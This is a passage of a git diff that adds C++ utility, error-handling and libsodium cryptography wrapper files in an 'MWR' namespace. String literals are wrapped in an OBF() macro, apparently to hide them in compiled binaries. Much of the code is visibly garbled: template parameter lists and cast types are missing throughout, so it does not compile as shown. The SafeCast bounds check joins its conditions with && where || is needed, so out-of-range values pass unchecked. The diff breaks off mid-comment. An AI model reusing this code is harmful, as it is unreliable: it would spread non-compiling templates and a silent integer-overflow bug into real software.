+ /// Usage: SCOPE_GUARD { expressions; that; will; be; processed; on; scope; leave; } +# define SCOPE_GUARD MWR::ScopeGuard SCOPE_GUARD_CAT(scope_guard_, __COUNTER__) = [&] +} diff --git a/Src/Common/MWR/CppTools/Utils.cpp b/Src/Common/MWR/CppTools/Utils.cpp new file mode 100644 index 0000000..3dd4157 --- /dev/null +++ b/Src/Common/MWR/CppTools/Utils.cpp @@ -0,0 +1,34 @@ +#include "StdAfx.h" +#include "Utils.h" + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::Utils::IsProcess64bit() +{ +#if defined(_WIN64) + return true; +#elif defined(_WIN32) + return false; +#endif +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::string MWR::Utils::GenerateRandomString(size_t size) +{ + static const std::string charset = OBF("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"); + static std::random_device rd; + static std::mt19937 gen(rd()); + static std::uniform_int_distribution uni(0, static_cast(charset.size() - 1)); + + std::string randomString; + randomString.resize(size); + for (auto& e : randomString) + e = charset[uni(gen)]; + + return randomString; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +int32_t MWR::Utils::TimeSinceEpoch() +{ + return static_cast(std::chrono::time_point_cast(std::chrono::system_clock::now()).time_since_epoch().count()); +} diff --git a/Src/Common/MWR/CppTools/Utils.h b/Src/Common/MWR/CppTools/Utils.h new file mode 100644 index 0000000..d3808af --- /dev/null +++ b/Src/Common/MWR/CppTools/Utils.h @@ -0,0 +1,86 @@ +#pragma once + +namespace MWR::Utils +{ + /// Check if application is 64bit. + /// @return true for x64 process. + bool IsProcess64bit(); + + /// Changes value to default if it is out of provided range. + /// @param value to be clamped. + /// @param minValue lowest accepted value. + /// @param maxValue highest accepted value + /// @param defaultValue default value if out of range. + /// @return bool indicating if value was reseted to defaultValue. + template + bool IsInRange(T& value, T2 minValue, T2 maxValue, T2 defaultValue) + { + if (value >= minValue && value <= maxValue) + return false; + + value = defaultValue; + return true; + } + + /// Generate random string. + /// @param size of returned string. + std::string GenerateRandomString(size_t size); + + /// Generate random unsigned int value. + /// @param rangeFrom minimal allowed value. + /// @param rangeTo maximal allowed value. + /// @return random value. + template + T GenerateRandomValue(T rangeFrom = std::numeric_limits::min(), T rangeTo = std::numeric_limits::max()) + { + // Based on https://stackoverflow.com/a/7560564. + static std::random_device rd; //< Obtain a random number from hardware. + static std::mt19937 eng(rd()); //< Seed the generator. + std::uniform_int_distribution distr(rangeFrom, rangeTo); //< Define the range. + + return distr(eng); + } + + /// Generate random std::chrono:duration value. + /// @param rangeFrom minimal allowed value. + /// @param rangeTo maximal allowed value. + /// @return random value. + template + std::chrono::duration GenerateRandomValue(std::chrono::duration rangeFrom, std::chrono::duration rangeTo) + { + return std::chrono::duration{ GenerateRandomValue(rangeFrom.count(), rangeTo.count()) }; + } + + /// Cast a integral value to a different integral type, checking if the cast can be performed + /// @tparam T - type to cast to + /// @tparam T2 - type to cast from + /// @param in - the value to cast + /// @returns a value in T type + /// @throws std::out_of_range if the value cannot be represented in T type + template + std::enable_if_t<(std::is_integral_v&& std::is_integral_v), T> SafeCast(T2 in) + { + if (in < std::numeric_limits::min() && in > std::numeric_limits::max()) + throw std::out_of_range{ OBF("Cast cannot be performed") }; + + return static_cast(in); + } + + /// Impersonation of Y2038 problem + int32_t TimeSinceEpoch(); + + /// Alias for float based seconds + using FloatSeconds = std::chrono::duration; + + /// Alias for double based seconds + using DoubleSeconds = std::chrono::duration; + + /// Get millisecond representation + /// @param seconds - number of seconds + /// @returns number of milliseconds from floating seconds + constexpr inline std::chrono::milliseconds ToMilliseconds(float seconds) + { + using namespace std::chrono; + return ceil(FloatSeconds{ seconds }); + } +} diff --git a/Src/Common/MWR/CppTools/XError.h b/Src/Common/MWR/CppTools/XError.h new file mode 100644 index 0000000..eabbb63 --- /dev/null +++ b/Src/Common/MWR/CppTools/XError.h @@ -0,0 +1,246 @@ +#pragma once + +namespace MWR::CppCommons::CppTools +{ +# pragma region Internal structures + + /// Base, abstract structure for all XError incarnations. + template struct XErrorBase + { + /// Template params storage. + typedef UnderlyingType UnderlyingType; + + /// Public ctor. + /// @param value initialization value. + XErrorBase(UnderlyingType value) : m_Value(value) { /*XErrorLogger(&value);*/ } + + /// UnderlyingType conversion operator. + /// @return XError's UnderlyingObject's current value. + operator UnderlyingType() { return m_Value; } + + /// Constant UnderlyingType conversion operator. + /// @return XError's UnderlyingObject's current value. + operator UnderlyingType() const { return m_Value; } + + /// Dereference operator. + /// @return XError's UnderlyingObject's current value. + UnderlyingType* operator * () { return &m_Value; } + + /// Constant dereference operator. + /// @return XError's UnderlyingObject's current value. + UnderlyingType* operator * () const { return &m_Value; } + + /// Arrow operator. + /// @return XError's UnderlyingObject's current value. + UnderlyingType* operator -> () { return &m_Value; } + + /// Constant arrow operator. + /// @return XError's UnderlyingObject's current value. + UnderlyingType* operator -> () const { return &m_Value; } + + protected: + UnderlyingType m_Value; ///< Underlying value. + }; + + /// SFINAE for IsSuccess and IsFailure member functions. Used by XError template to deduce its contents. + template class XErrorContentDeducer + { + typedef char yes[1]; ///< Return type used to describe positive SFINAE resolution. + typedef char no[2]; ///< Return type used to describe negative SFINAE resolution. + template struct SFINAE {}; ///< Function signature. Note that it's the same for both IsSuccess and IsFailure. + + template static yes& TestIsSuccess(SFINAE*); ///< Positive tester for IsSuccess. + template static no& TestIsSuccess(...); ///< Negative tester for IsSuccess. + + template static yes& TestIsFailure(SFINAE*); ///< Positive tester for IsFailure. + template static no& TestIsFailure(...); ///< Negative tester for IsFailure. + + public: + static const bool hasIsSuccess = sizeof(TestIsSuccess(nullptr)) == sizeof(yes); ///< Final tester for IsSuccess. + static const bool hasIsFailure = sizeof(TestIsFailure(nullptr)) == sizeof(yes); ///< Final tester for IsFailure. + }; + + /// Abstract parent template to all XErrorImpl. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl; + + /// XError specialization for types devoid of both IsSuccess and IsFailure methods. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(UnderlyingType value) : XErrorBase(value) { } + }; + + /// XError specialization for types that have no IsFailure method but do have IsSuccess method implemented. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(UnderlyingType value) : XErrorBase(value) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return m_Value.IsSuccess(m_Value); } + }; + + /// XError specialization for types that have no IsSuccess method but do have IsFailure method implemented. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(UnderlyingType value) : XErrorBase(value) { } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return m_Value.IsFailure(); } + }; + + /// XError specialization for types that have both IsSuccess and IsFailure methods implemented. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(UnderlyingType value) : XErrorBase(value) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return m_Value.IsSuccess(); } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return m_Value.IsFailure(); } + }; + + /// XError specialization for HRESULT - let's provide IsSuccess and IsFailure. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template <> struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(HRESULT value) : XErrorBase(value) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return SUCCEEDED(m_Value); } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return FAILED(m_Value); } + }; + + /// XError specialization for bool type. IsSuccess and IsFailure methods are just value redirectors. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template <> struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(bool value) : XErrorBase(value) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return m_Value; } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return !m_Value; } + }; + + /// XError specialization for pointers. IsSuccess and IsFailure are comparisons to nullptr. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(UnderlyingPointerType value) : XErrorBase(value) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return m_Value; } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return !m_Value; } + }; + + /// XError specialization for enums. We assume here that value equal to zero means success. @note You shouldn't use XErrorImpl templates directly. They have internal purposes. Use XError template instead. + template struct XErrorImpl : public XErrorBase + { + /// Public ctor. + /// @param value object value + XErrorImpl(UnderlyingEnumType value) : XErrorBase(value) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return (long long int)(m_Value) == 0; } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return (long long int)(m_Value) != 0; } + }; + + /// EnumWithHresult structure. A handy wrapper for functions performing many API calls, to indicate not only which error (HRESULT), but where (provided enum) it was obtained. + template struct EnumWithHresult + { + /// Template params storage. + typedef Enum Enum; + + /// Getter for underlying enum. + /// @return underlying enum. + Enum GetApiCall() const { return m_ApiCall; } + + /// Getter for hresult. + /// @return hresult value. + HRESULT GetHresult() const { return m_ErrorCode; } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return SUCCEEDED(m_ErrorCode); } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return FAILED(m_ErrorCode); } + + // Public members provided to allow simple initialization of EnumWithHresult with aggregation operator { }. + Enum m_ApiCall; ///< Underlying enum value. + HRESULT m_ErrorCode; ///< HRESULT value. + }; + + /// SystemError structure. A handy wrapper that can be used in code sections which disallows converting system error code to HRESULT. + struct SystemErrorCode + { + /// Public ctor. + SystemErrorCode(DWORD code) : m_ErrorCode(code) { } + + /// Success translator. + /// @return true if current state of the object indicates success. + bool IsSuccess() const { return !m_ErrorCode; } + + /// Failure translator. + /// @return true if current state of the object indicates failure. + bool IsFailure() const { return m_ErrorCode != 0; } + + /// Const DWORD conversion operator. + operator DWORD () const { return m_ErrorCode; } + + /// DWORD conversion operator. + operator DWORD () { return m_ErrorCode; } + + // Public members provided to allow simple initialization of this structure with aggregation operator { }. + DWORD m_ErrorCode; ///< System error code value. + }; + +# pragma endregion Internal structures + //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + + // Finally, the XError alias templates. + template using XError = XErrorImpl::hasIsSuccess, XErrorContentDeducer::hasIsFailure, std::is_pointer::value, std::is_enum::value>; ///< Main deducer. + template using XErrorRaw = XErrorImpl; ///< XError devoid of implicit IsSuccess and IsFailure implementations. + template using XErrorEnumWithHresult = XError>; ///< A handy alias for XError specialization with EnumWithHresult. + + // Creator templates. + template XError XErrorCreator(const T& value) { return value; } ///< A universal Creator. + template XErrorRaw XErrorRawCreator(const T& value) { return value; } ///< Creator of raw XErrors. + template XErrorEnumWithHresult XErrorEnumWithHresultCreator(TEnum enumValue, HRESULT hr) ///< Creator for EnumWithHresult template. + { static_assert(std::is_enum::value, OBF("XErrorEwhCreator template requires enumeration type.")); return MWR::CppCommons::CppTools::EnumWithHresult{ enumValue, hr }; } + + // Macros. @warning There is no XError. Value got by calling GetLastError() should be immediately converted to HRESULT, e.g. by using those macros: +# define XERROR_GETLASTERROR MWR::CppCommons::CppTools::XErrorCreator(HRESULT_FROM_WIN32(GetLastError())) +# define XERRORRAW_GETLASTERROR MWR::CppCommons::CppTools::XErrorRawCreator(HRESULT_FROM_WIN32(GetLastError())) +} diff --git a/Src/Common/MWR/Crypto/Base32.h b/Src/Common/MWR/Crypto/Base32.h new file mode 100644 index 0000000..d53c344 --- /dev/null +++ b/Src/Common/MWR/Crypto/Base32.h @@ -0,0 +1,4 @@ +#pragma once + +// Using CppCodec. +#include "Common/CppCodec/base32_default_crockford.hpp" diff --git a/Src/Common/MWR/Crypto/Base64.h b/Src/Common/MWR/Crypto/Base64.h new file mode 100644 index 0000000..9a78df5 --- /dev/null +++ b/Src/Common/MWR/Crypto/Base64.h @@ -0,0 +1,4 @@ +#pragma once + +// Using CppCodec. +#include "Common/CppCodec/base64_default_rfc4648.hpp" diff --git a/Src/Common/MWR/Crypto/Crypto.hpp b/Src/Common/MWR/Crypto/Crypto.hpp new file mode 100644 index 0000000..1176c62 --- /dev/null +++ b/Src/Common/MWR/Crypto/Crypto.hpp @@ -0,0 +1,5 @@ +#pragma once + +#include "Sodium.h" +#include "Base64.h" +#include "Base32.h" diff --git a/Src/Common/MWR/Crypto/EncryptionKey.h b/Src/Common/MWR/Crypto/EncryptionKey.h new file mode 100644 index 0000000..70fa3c0 --- /dev/null +++ b/Src/Common/MWR/Crypto/EncryptionKey.h @@ -0,0 +1,84 @@ +#pragma once + +#include "Common/MWR/CppTools/ByteView.h" + +namespace MWR::Crypto +{ + /// Template class for encryption keys. + /// @tparam size Key length in bytes. + /// @tparam Tag Token used identify Key and to eliminate conversion between same-size public and private keys. + template + struct Key + { + /// Construct empty key. + Key() = default; + + /// Construct key from byte view. + /// @param buffer binary key data . + /// @throws std::logic_error if data size is not equal to key size. + Key(ByteView buffer) + { + if (buffer.size() != size) + throw std::logic_error(OBF("Failed to convert data to Key - invalid data size")); + + m_Bytes = buffer; + } + + /// Construct key from buffer. + /// @param buffer binary key data . + /// @throws std::logic_error if data size is not equal to key size. + Key(ByteVector buffer) + { + if (buffer.size() != size) + throw std::logic_error(OBF("Failed to convert data to Key - invalid data size")); + + m_Bytes = std::move(buffer); + } + + /// Check if key is valid. + /// @return false if key is empty + bool IsValid() const noexcept + { + return !m_Bytes.empty(); + } + + /// Check if key is valid. + /// @return false if key is empty. + operator bool() const noexcept + { + return IsValid(); + } + + /// Get key data. + /// @return pointer to key bytes. + /// @throws std::logic_error if key is empty. + ByteVector const& ToByteVector() const + { + if (!IsValid()) + throw std::logic_error(OBF("Failed to access key bytes - key invalid")); + + return m_Bytes; + } + + /// Get key data. + /// @return raw pointer to key bytes. + /// @throws std::logic_error if key is empty. + uint8_t const* data() const + { + return ToByteVector().data(); + } + + /// Represent key as base64 string. + /// @return base64 string + /// @throws std::logic_error if key is empty. + std::string ToBase64() const + { + return cppcodec::base64_rfc4648::encode(std::string{ ByteView{ToByteVector()} }); + } + + static constexpr size_t Size = size; ///< Key size in bytes. + + private: + ByteVector m_Bytes; ///< Key bytes buffer. + }; +} diff --git a/Src/Common/MWR/Crypto/Nonce.h b/Src/Common/MWR/Crypto/Nonce.h new file mode 100644 index 0000000..57a22b3 --- /dev/null +++ b/Src/Common/MWR/Crypto/Nonce.h @@ -0,0 +1,29 @@ +#pragma once + +namespace MWR::Crypto +{ + inline namespace Sodium + { + /// A number sequence that is used only once. + template + struct Nonce + { + /// Public constructor that fill the Nonce with a random sequence. + Nonce() noexcept + { + randombytes_buf(m_Nonce, sizeof(m_Nonce)); + } + + /// Nonce bytes getter. + /// @return Nonce bytes. + operator uint8_t const* () const noexcept + { + return m_Nonce; + } + + constexpr static size_t Size = isForSymmetricEncryption ? crypto_secretbox_NONCEBYTES : crypto_box_NONCEBYTES; ///< Size of nonce in bytes. + private: + uint8_t m_Nonce[Nonce::Size]; ///< Nonce buffer. + }; + } +} \ No newline at end of file diff --git a/Src/Common/MWR/Crypto/PrecompiledHeader.hpp b/Src/Common/MWR/Crypto/PrecompiledHeader.hpp new file mode 100644 index 0000000..57aa309 --- /dev/null +++ b/Src/Common/MWR/Crypto/PrecompiledHeader.hpp @@ -0,0 +1,34 @@ +#pragma once + +// Windows includes. +#ifndef NOMINMAX +# define NOMINMAX //< Exclude min and max macros from windows.h. +#endif +#define WIN32_LEAN_AND_MEAN //< Exclude rarely-used stuff from Windows headers. +#include //< Windows cryptography. + +// External dependencies. +#if !defined(SODIUM_STATIC) +# define SODIUM_STATIC +#endif + +#if !defined(SODIUM_EXPORT) +# define SODIUM_EXPORT +#endif + +#include "Common/libSodium/include/sodium.h" //< LibSodium. + +// Static libraries. +#ifdef _WIN64 +# ifdef _DEBUG +# pragma comment(lib, "Common/libSodium/libsodium-x64-v141-debug.lib") +# else +# pragma comment(lib, "Common/libSodium/libsodium-x64-v141-release.lib") +# endif +#else +# ifdef _DEBUG +# pragma comment(lib, "Common/libSodium/libsodium-x86-v141-debug.lib") +# else +# pragma comment(lib, "Common/libSodium/libsodium-x86-v141-release.lib") +# endif +#endif diff --git a/Src/Common/MWR/Crypto/Sodium.cpp b/Src/Common/MWR/Crypto/Sodium.cpp new file mode 100644 index 0000000..212ce4b --- /dev/null +++ b/Src/Common/MWR/Crypto/Sodium.cpp @@ -0,0 +1,248 @@ +#include "StdAfx.h" +#include "Sodium.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::AsymmetricKeys MWR::Crypto::Sodium::GenerateAsymmetricKeys() +{ + ByteVector publicKey(PublicKey::Size), privateKey(PrivateKey::Size); + if (crypto_box_keypair(publicKey.data(), privateKey.data())) + throw std::runtime_error{ OBF("Asymmetric keys generation failed.") }; + + return std::make_pair(privateKey, publicKey); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::SignatureKeys MWR::Crypto::Sodium::GenerateSignatureKeys() +{ + ByteVector publicSignature(PublicSignature::Size), privateSignature(PrivateSignature::Size); + if (crypto_sign_keypair(publicSignature.data(), privateSignature.data())) + throw std::runtime_error{ OBF("Signature keys generation failed.") }; + + return std::make_pair(privateSignature, publicSignature); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::SymmetricKey MWR::Crypto::Sodium::GenerateSymmetricKey() noexcept +{ + ByteVector key(SymmetricKey::Size); + crypto_secretbox_keygen(key.data()); + return key; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::EncryptAnonymously(ByteView plaintext, SymmetricKey const& key) +{ + Nonce nonce; + ByteVector encryptedMessage(plaintext.size() + crypto_secretbox_MACBYTES + Nonce::Size); + + // Perpend ciphertext with nonce. + memcpy(encryptedMessage.data(), nonce, Nonce::Size); + if (crypto_secretbox_easy(encryptedMessage.data() + Nonce::Size, plaintext.data(), plaintext.size(), nonce, key.data())) + throw std::runtime_error{ OBF("Encryption failed.") }; + + return encryptedMessage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::DecryptFromAnonymous(ByteView message, SymmetricKey const& key) +{ + // Sanity check. + if (message.size() < Nonce::Size + crypto_secretbox_MACBYTES) + throw std::invalid_argument{ OBF("Ciphertext too short.") }; + + // Retrieve nonce. + auto nonce = message.SubString(0, Nonce::Size), ciphertext = message.SubString(Nonce::Size); + + // Decrypt. + ByteVector decryptedMessage(ciphertext.size() - crypto_secretbox_MACBYTES); + if (crypto_secretbox_open_easy(decryptedMessage.data(), ciphertext.data(), ciphertext.size(), nonce.data(), key.data())) + throw std::runtime_error{ OBF("Message forged.") }; + + return decryptedMessage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::EncryptAnonymously(ByteView plaintext, PublicKey const& encryptionKey) +{ + ByteVector ciphertext(plaintext.size() + crypto_box_SEALBYTES); + if (crypto_box_seal(ciphertext.data(), plaintext.data(), plaintext.size(), encryptionKey.data())) + throw std::runtime_error{ OBF("Encryption failed.") }; + + return ciphertext; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::DecryptFromAnonymous(ByteView ciphertext, PublicKey const& myEncryptionKey, PrivateKey const& myDecryptionKey) +{ + // Sanity check. + if (ciphertext.size() < crypto_box_SEALBYTES) + throw std::invalid_argument{ "Ciphertext too short." }; + + ByteVector decryptedMesage(ciphertext.size() - crypto_box_SEALBYTES); + if (crypto_box_seal_open(decryptedMesage.data(), ciphertext.data(), ciphertext.size(), myEncryptionKey.data(), myDecryptionKey.data())) + throw std::runtime_error{ OBF("Message corrupted or not intended for this recipient.") }; + + return decryptedMesage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::EncryptAndSign(ByteView plaintext, SymmetricKey const& key, PrivateSignature const& signature) +{ + return EncryptAnonymously(SignMessage(plaintext, signature), key); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::DecryptAndVerify(ByteView ciphertext, SymmetricKey const& key, PublicSignature const& signature) +{ + return VerifyMessage(DecryptFromAnonymous(ciphertext, key), signature); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::EncryptAndAuthenticate(ByteView plaintext, PublicKey const& theirPublicKey, PrivateKey const& myPrivateKey) +{ + Nonce nonce; + ByteVector encryptedMessage(plaintext.size() + crypto_box_MACBYTES + Nonce::Size); + + // Perpend ciphertext with nonce. + memcpy(encryptedMessage.data(), nonce, Nonce::Size); + if (crypto_box_easy(encryptedMessage.data() + Nonce::Size, plaintext.data(), plaintext.size(), nonce, theirPublicKey.data(), myPrivateKey.data())) + throw std::runtime_error{ OBF("Encryption failed.") }; + + return encryptedMessage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::DecryptAndAuthenticate(ByteView message, PublicKey const& theirPublicKey, PrivateKey const& myPrivateKey) +{ + // Sanity check. + if (message.size() < Nonce::Size + crypto_box_MACBYTES) + throw std::invalid_argument{ OBF("Ciphertext too short.") }; + + // Retrieve nonce. + auto nonce = message.SubString(0, Nonce::Size), ciphertext = message.SubString(Nonce::Size); + + // Decrypt. + ByteVector decryptedMessage(ciphertext.size() - crypto_box_MACBYTES); + if (crypto_box_open_easy(decryptedMessage.data(), ciphertext.data(), ciphertext.size(), nonce.data(), theirPublicKey.data(), myPrivateKey.data())) + throw std::runtime_error{ OBF("Message forged.") }; + + return decryptedMessage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::SignMessage(ByteView message, PrivateSignature const& signature) +{ + ByteVector signedMessage(message.size() + crypto_sign_BYTES); + if (crypto_sign(signedMessage.data(), nullptr, message.data(), message.size(), signature.data())) + throw std::runtime_error{ OBF("Couldn't sign message.") }; + + return signedMessage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Crypto::Sodium::VerifyMessage(ByteView signedMessage, PublicSignature const& signature) +{ + // Sanity check. + if (signedMessage.size() < crypto_sign_BYTES) + throw std::invalid_argument{ OBF("Signed message too short.") }; + + // Verify. + ByteVector verifiedMessage(signedMessage.size() - crypto_sign_BYTES); + if (crypto_sign_open(verifiedMessage.data(), nullptr, signedMessage.data(), signedMessage.size(), signature.data())) + throw std::runtime_error{ OBF("Signature verification failed.") }; + + // TODO: using crypto_sign_open_detached it could return a ByteView of signedMessage without copy. + return verifiedMessage; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::PublicKey MWR::Crypto::Sodium::ConvertToKey(PublicSignature const& signature) +{ + ByteVector convertedKey(crypto_scalarmult_curve25519_BYTES); + if (crypto_sign_ed25519_pk_to_curve25519(convertedKey.data(), signature.data())) + throw std::runtime_error{ OBF("Signature to Key (public) Conversion failed.") }; + + return convertedKey; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::PrivateKey MWR::Crypto::Sodium::ConvertToKey(PrivateSignature const& signature) +{ + ByteVector convertedKey(crypto_scalarmult_curve25519_BYTES); + if (crypto_sign_ed25519_sk_to_curve25519(convertedKey.data(), signature.data())) + throw std::runtime_error{ OBF("Signature to Key (secret) conversion failed.") }; + + return convertedKey; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::PublicSignature MWR::Crypto::Sodium::ExtractPublic(PrivateSignature const& signature) +{ + ByteVector publicSignature(crypto_scalarmult_curve25519_BYTES); + if (crypto_sign_ed25519_sk_to_pk(publicSignature.data(), signature.data())) + throw std::runtime_error{ OBF("Signature (secret to public) conversion failed.") }; + + return publicSignature; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::ExchangeKeys MWR::Crypto::Sodium::GenerateExchangeKeys() +{ + ByteVector publicKey(ExchangePublicKey::Size); + ByteVector privateKey(ExchangePrivateKey::Size); + if (crypto_kx_keypair(publicKey.data(), privateKey.data())) + throw std::runtime_error{ OBF("Exchange keys generation failed.") }; + + return { privateKey, publicKey }; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Crypto::Sodium::SessionKeys MWR::Crypto::Sodium::GenerateClientSessionKeys(ExchangeKeys const& selfKeys, ExchangePublicKey const& serverKey) +{ + ByteVector rxKey(SessionRxKey::Size); + ByteVector txKey(SessionTxKey::Size); + if(crypto_kx_client_session_keys(rxKey.data(), txKey.data(), selfKeys.second.data(), selfKeys.first.data(), serverKey.data())) + throw std::runtime_error{ OBF("Session keys generation failed.") }; + + return { rxKey, txKey }; +} + +MWR::Crypto::Sodium::SessionKeys MWR::Crypto::Sodium::GenerateServerSessionKeys(ExchangeKeys const& selfKeys, ExchangePublicKey const& clientKey) +{ + ByteVector rxKey(SessionRxKey::Size); + ByteVector txKey(SessionTxKey::Size); + if (crypto_kx_server_session_keys(rxKey.data(), txKey.data(), selfKeys.second.data(), selfKeys.first.data(), clientKey.data())) + throw std::runtime_error{ OBF("Session keys generation failed.") }; + + return { rxKey, txKey }; +} + +MWR::ByteVector MWR::Crypto::Sodium::Encrypt(ByteView plaintext, SessionTxKey const& key) +{ + Nonce nonce; + ByteVector encryptedMessage(plaintext.size() + crypto_secretbox_MACBYTES + Nonce::Size); + + // Perpend ciphertext with nonce. + memcpy(encryptedMessage.data(), nonce, Nonce::Size); + if (crypto_secretbox_easy(encryptedMessage.data() + Nonce::Size, plaintext.data(), plaintext.size(), nonce, key.data())) + throw std::runtime_error{ OBF("Encryption failed.") }; + + return encryptedMessage; +} + +MWR::ByteVector MWR::Crypto::Sodium::Decrypt(ByteView message, SessionRxKey const& key) +{ + // Sanity check. + if (message.size() < Nonce::Size + crypto_secretbox_MACBYTES) + throw std::invalid_argument{ OBF("Ciphertext too short.") }; + + // Retrieve nonce. + auto nonce = message.SubString(0, Nonce::Size), ciphertext = message.SubString(Nonce::Size); + + // Decrypt. + ByteVector decryptedMessage(ciphertext.size() - crypto_secretbox_MACBYTES); + if (crypto_secretbox_open_easy(decryptedMessage.data(), ciphertext.data(), ciphertext.size(), nonce.data(), key.data())) + throw std::runtime_error{ OBF("Message forged.") }; + + return decryptedMessage; +} diff --git a/Src/Common/MWR/Crypto/Sodium.h b/Src/Common/MWR/Crypto/Sodium.h new file mode 100644 index 0000000..2a1ef4a --- /dev/null +++ b/Src/Common/MWR/Crypto/Sodium.h @@ -0,0 +1,161 @@ +#pragma once + +// Details. +#include "Nonce.h" +#include "EncryptionKey.h" + +namespace MWR::Crypto +{ + /// Wrappers for libsodium + inline namespace Sodium + { + // Helper aliases. + using PublicKey = Key; + using PrivateKey = Key; + using AsymmetricKeys = std::pair; + using PublicSignature = Key; + using PrivateSignature = Key; + using SignatureKeys = std::pair; + using SymmetricKey = Key; + using ExchangePublicKey = Key; + using ExchangePrivateKey = Key; + using ExchangeKeys = std::pair; + using SessionTxKey = Key< crypto_kx_SESSIONKEYBYTES, struct SessionTxKeyTag>; + using SessionRxKey = Key< crypto_kx_SESSIONKEYBYTES, struct SessionRxKeyTag>; + using SessionKeys = std::pair; + + /// Generate a key pair for asymmetric encryption. + /// @return a pair of encryption keys (public and private). + /// @throws std::runtime_error if keys couldn't be generated + AsymmetricKeys GenerateAsymmetricKeys(); + + /// Generate a key pair for asymmetric signature. + /// @return a pair of signature keys (public and private). + /// @throws std::runtime_error if keys couldn't be generated + SignatureKeys GenerateSignatureKeys(); + + /// Generate a key for asymmetric signature. + /// @return a symmetric encryption key. + SymmetricKey GenerateSymmetricKey() noexcept; + + /// Generate a key pair for key exchange. + /// @returns a pair of keys to perform a key 